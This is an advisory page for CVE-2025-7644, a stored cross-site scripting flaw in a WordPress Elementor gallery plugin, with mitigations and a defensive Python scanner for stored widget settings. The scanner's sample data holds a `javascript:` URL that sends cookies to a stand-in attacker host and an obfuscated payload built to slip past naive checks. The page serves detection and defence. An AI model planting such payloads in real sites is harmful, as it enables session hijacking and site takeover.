CVE-2025-7644: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in bdthemes Pixel Gallery Addons for Elementor – Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, Portfolio Gallery
The Pixel Gallery Addons for Elementor – Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout, Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URLs in all widgets in all versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AI Analysis
Technical Summary
CVE-2025-7644 is a stored Cross-Site Scripting (XSS) vulnerability in the Pixel Gallery Addons for Elementor WordPress plugin (the package whose widgets include Easy Grid, Creative Gallery, Drag and Drop Grid, Custom Grid Layout and Portfolio Gallery). Per the advisory it affects URL fields in all of the plugin's widgets, in every version up to and including 1.6.7. The root cause is improper neutralization of input during web page generation (CWE-79): URL values entered through the widgets' settings are written into the rendered page without adequate validation or output escaping. For URL-sourced XSS the usual failure is that the scheme is never checked, so a value such as a `javascript:` URL passes through attribute escaping unchanged and is treated by the browser as script rather than as a location. An authenticated user with Contributor-level access or higher can therefore store a malicious URL in a widget; the script runs in the browser of anyone who views the affected page, including an editor or administrator previewing the contributor's draft, and can act within that victim's session (for an administrator, that extends to creating users or installing plugins), which is how a medium-severity XSS turns into a full site compromise. The CVSS 3.1 base score is 6.4 (medium): network attack vector, low attack complexity, low privileges required, no user interaction, changed scope, and low confidentiality and integrity impact with no availability impact. No public exploit had been reported at the time of publication, but Elementor addons are widely deployed, and no patched version was listed at that time, so mitigation should not wait for one.
Potential Impact
For European organizations running the affected plugin, the risk falls on the website itself and on everyone who uses it. A stored payload can read data the victim's browser can reach, perform actions on the victim's behalf (for a logged-in administrator, that includes administrative changes to the site), or inject content that damages brand reputation and trust. Organizations with a large web presence, such as e-commerce, media, education and government sites, are the most exposed. A compromised site can also become a pivot for attacks on the organization's users, partners or supply chain. Because exploitation requires an authenticated account with Contributor-level access or above, the realistic attackers are insiders and anyone holding a compromised or loosely provisioned contributor account, for example a guest author or an agency login that was never revoked. The flaw also lends itself to phishing and social engineering against European users, and any resulting exposure of personal data can trigger GDPR breach-notification obligations.
Mitigation Recommendations
European organizations should immediately audit their WordPress installations for the Pixel Gallery Addons for Elementor plugin at version 1.6.7 or earlier (the version is shown on the Plugins screen and in the plugin's header comment). Until an official patch is installed, the following mitigations apply:
1) Restrict Contributor-level and higher roles to trusted users, remove stale accounts, and enforce multi-factor authentication on every account that can edit content. If contributors do not need the Elementor editor at all, Elementor's Role Manager can remove their editor access.
2) Review content already saved by contributor accounts, in particular the link and URL settings of the plugin's widgets stored in post meta, for `javascript:` or `data:` schemes and other script-bearing values; a patch stops new injections but does not remove what was stored before it.
3) Use a Web Application Firewall with rules that reject disallowed URL schemes in widget settings submitted through the Elementor editor, and treat such a rejection as an alert, not only a block.
4) Deploy a Content Security Policy on the public site that does not allow `'unsafe-inline'` scripts; this neutralises `javascript:` URLs and inline handlers on the front end. The WordPress admin area generally depends on inline scripts, so CSP protects visitors more than it protects administrators reviewing drafts.
5) Run security scans and penetration tests that specifically cover stored XSS in the plugin's widgets, including preview of unpublished drafts, which is where an administrator first meets a contributor's payload.
6) Brief content contributors on the risk of pasting untrusted links and markup, and monitor application and web server logs for save requests carrying script-like URL values.
Once a patched release is available, test and deploy it promptly, then repeat step 2 so that nothing stored before the fix is left in place.
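The following Python is an added example written for this page; it is not code from the plugin, from Wordfence or from the advisory. It illustrates the technical summary's point that escaping a URL for an attribute does not stop a `javascript:` payload (a scheme allow-list is needed), and it implements the audit in step 2 above by walking the JSON that Elementor stores in the `_elementor_data` post meta and flagging link-like settings with a disallowed scheme. The function names, the widget type string `pixel-gallery-easy-grid`, the setting keys and the sample document are assumptions for illustration only; the tree shape (elements with `settings` and nested `elements`, link controls stored as `{"url": ...}`) follows Elementor's usual storage layout.

```python
"""Added example for this advisory (not code from the plugin, Wordfence or the
page): why escaping a URL is not enough to stop URL-based stored XSS, what a
scheme allow-list check looks like, and how to hunt for such values in the
widget settings Elementor stores as JSON in the `_elementor_data` post meta.
Function names, setting keys and the widget type string are assumptions."""
from __future__ import annotations

import html
import json
import re

# Schemes a gallery or link widget legitimately needs; everything else
# (javascript:, data:, vbscript:) is rejected before it reaches the markup.
ALLOWED_SCHEMES = {"http", "https", "mailto", "tel"}

# Browsers drop ASCII control characters and whitespace while parsing a URL,
# so " JaVa\tScRiPt:" still runs. Normalise the same way before reading the
# scheme, otherwise a plain prefix check is trivially bypassed.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)


def url_scheme(url: str) -> str | None:
    """Return the lower-cased scheme a browser would see, None for relative URLs."""
    match = _SCHEME.match(_CONTROL_WS.sub("", url))
    return match.group(1).lower() if match else None


def is_safe_url(url: str) -> bool:
    scheme = url_scheme(url)
    return scheme is None or scheme in ALLOWED_SCHEMES


def render_link_vulnerable(url: str, label: str) -> str:
    """The CWE-79 pattern: attribute escaping only. 'javascript:alert(1)'
    contains nothing that html.escape() touches, so it lands in href verbatim."""
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def render_link_hardened(url: str, label: str) -> str:
    """Validate the scheme first (the job esc_url() does in WordPress), then
    escape for the attribute context. A rejected URL renders as an empty href."""
    safe = url if is_safe_url(url) else ""
    return f'<a href="{html.escape(safe, quote=True)}">{html.escape(label)}</a>'


def iter_link_settings(node, path: str = ""):
    """Yield (setting_path, url) for every link-like value in a settings tree.
    Elementor link controls are stored as {"url": ...}; repeater rows (gallery
    items) are lists of dicts, so recurse through both."""
    if isinstance(node, dict):
        for key, value in node.items():
            sub = f"{path}.{key}" if path else key
            if isinstance(value, str) and ("url" in key or "link" in key):
                yield sub, value
            else:
                yield from iter_link_settings(value, sub)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from iter_link_settings(item, f"{path}[{i}]")


def scan_elementor_data(elementor_data: str) -> list[dict]:
    """Walk a `_elementor_data` JSON document and report each link-like setting
    whose scheme is not on the allow-list. One finding per offending value."""
    findings: list[dict] = []

    def walk(elements: list, path: str) -> None:
        for el in elements:
            el_path = f"{path}/{el.get('widgetType') or el.get('elType')}[{el.get('id')}]"
            for setting, url in iter_link_settings(el.get("settings", {})):
                if not is_safe_url(url):
                    findings.append({"element": el_path, "setting": setting,
                                     "scheme": url_scheme(url), "value": url})
            walk(el.get("elements", []), el_path)

    walk(json.loads(elementor_data), "")
    return findings


# Constructed sample: one section/column holding one (hypothetically named)
# gallery widget. The image URLs and the first row link are benign; the second
# row link and a top-level URL setting carry javascript: payloads, the latter
# obfuscated with mixed case and a tab.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1b2c3", "elType": "section", "elements": [
        {"id": "d4e5f6", "elType": "column", "elements": [
            {"id": "0a1b2c", "elType": "widget", "widgetType": "pixel-gallery-easy-grid",
             "settings": {
                 "title": "Portfolio",
                 "items": [
                     {"_id": "r1", "image": {"url": "https://example.org/1.jpg"},
                      "link": {"url": "https://example.org/work/1"}},
                     {"_id": "r2", "image": {"url": "https://example.org/2.jpg"},
                      "link": {"url": "javascript:fetch('https://attacker.example/?c='+document.cookie)"}},
                 ],
                 "lightbox_url": " JaVa\tScRiPt:alert(document.domain)",
             }},
        ]},
    ]},
])

if __name__ == "__main__":
    print(render_link_vulnerable("javascript:alert(1)", "demo"))
    print(render_link_hardened("javascript:alert(1)", "demo"))
    for finding in scan_elementor_data(SAMPLE_ELEMENTOR_DATA):
        print(finding)
```

On a live site the JSON for a post comes from WP-CLI (`wp post meta get <post_id> _elementor_data`) or from a query on `wp_postmeta` for `meta_key = '_elementor_data'`; feed each document to `scan_elementor_data` and treat any finding on a post last modified by a Contributor account as a probable exploitation attempt rather than a false positive. The allow-list is deliberately short; add schemes only when a widget genuinely needs them.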
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: Wordfence
- Date Reserved: 2025-07-14T15:22:33.545Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 687f140aa83201eaac181672
Added to database: 7/22/2025, 4:31:06 AM
Last enriched: 7/22/2025, 4:46:21 AM
Last updated: 7/22/2025, 4:46:21 AM
Related Threats
- CVE-2025-7705: CWE-489: Active Debug Code in ABB Switch Actuator 4 DU (Medium)
- CVE-2025-4285: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Rolantis Information Technologies Agentis (Critical)
- CVE-2025-4284: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Rolantis Information Technologies Agentis (Medium)
- CVE-2025-7900: CWE-639 Authorization Bypass Through User-Controlled Key in TYPO3 Extension "femanager" (Medium)
- CVE-2025-7899: CWE-639 Authorization Bypass Through User-Controlled Key in TYPO3 Extension "powermail" (Medium)